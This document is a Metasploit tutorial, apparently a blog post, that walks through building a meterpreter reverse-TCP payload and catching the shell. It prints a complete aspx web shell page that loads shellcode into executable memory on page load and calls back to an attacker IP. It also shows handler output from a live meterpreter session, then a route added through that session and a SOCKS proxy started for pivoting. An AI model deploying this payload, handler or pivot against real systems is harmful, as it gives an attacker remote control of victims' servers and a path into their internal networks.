Preface

Metasploit is an open-source vulnerability assessment tool that helps security and IT professionals identify security problems, verify that vulnerability mitigations work, and manage expert-driven security assessments, providing real security risk intelligence. Its capabilities cover exploit development, code auditing, web application scanning and social engineering. Metasploit really is an indispensable penetration testing tool.

Penetration testing: basic preparation

1 Generating payloads in MSF
Search for the meterpreter payloads:


search meterpreter

Configure the payload:


msf > use windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options

Module options (payload/windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

msf payload(reverse_tcp) > set lhost xxx.2x.xxx.56
lhost => 104.224.179.110
msf payload(reverse_tcp) > set lport 8090
lport => 8090
msf payload(reverse_tcp) >

List the output formats that can be generated:


msf payload(reverse_tcp) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -x <opt>  The executable template to use

Generate the payload; in this article we generate an aspx payload:


generate -t aspx

The generated code is as follows:


<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
    private static Int32 MEM_COMMIT=0x1000;
    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);

    protected void Page_Load(object sender, EventArgs e)
    {
        byte[] upOnTfgQu = new byte[281] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,
0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,
0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,
0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0x68,
0xe0,0xb3,0x6e,0x68,0x02,0x00,0x1f,0x9a,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,
0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,
0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,
0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,
0xc3,0x29,0xc6,0x75,0xee,0xc3 };

        IntPtr neKH = VirtualAlloc(IntPtr.Zero,(UIntPtr)upOnTfgQu.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        System.Runtime.InteropServices.Marshal.Copy(upOnTfgQu,0,neKH,upOnTfgQu.Length);
        IntPtr ladmo = IntPtr.Zero;
        IntPtr mJeW = CreateThread(IntPtr.Zero,UIntPtr.Zero,neKH,IntPtr.Zero,0,ref ladmo);
    }
</script>

2 Listening for the reverse meterpreter shell


msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > showoptions
[-] Unknown command: showoptions.
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set lhost 104.xxx.1x9.1x
lhost => 104.224.179.110
msf exploit(handler) > set lport 8090
lport => 8090
msf exploit(handler) > run

[*] Started reverse TCP handler on 104.224.179.110:8090
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to xxx.2x.144.56
[*] Meterpreter session 1 opened (104.xxx.1x9.1x:8090 -> xxx.2x.144.56:54243) at 2017-05-11 02:31:04 -0400

meterpreter > ps

3 Adding a route through the session


meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > route add 104.xxx.1x9.1x 255.255.255.0 1
[*] Route added

4 Setting up a SOCKS proxy


msf exploit(handler) > search socks
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                     Disclosure Date  Rank    Description
   ----                                     ---------------  ----    -----------
   auxiliary/scanner/http/sockso_traversal  2012-03-14       normal  Sockso Music Host Server 1.5 Directory Traversal
   auxiliary/server/socks4a                                  normal  Socks4a Proxy Server
   auxiliary/server/socks_unc                                normal  SOCKS Proxy UNC Path Redirection

msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy

msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

Using the various Metasploit modules proficiently

Because of length constraints, we will show in a later article how to actually use msf for network penetration testing.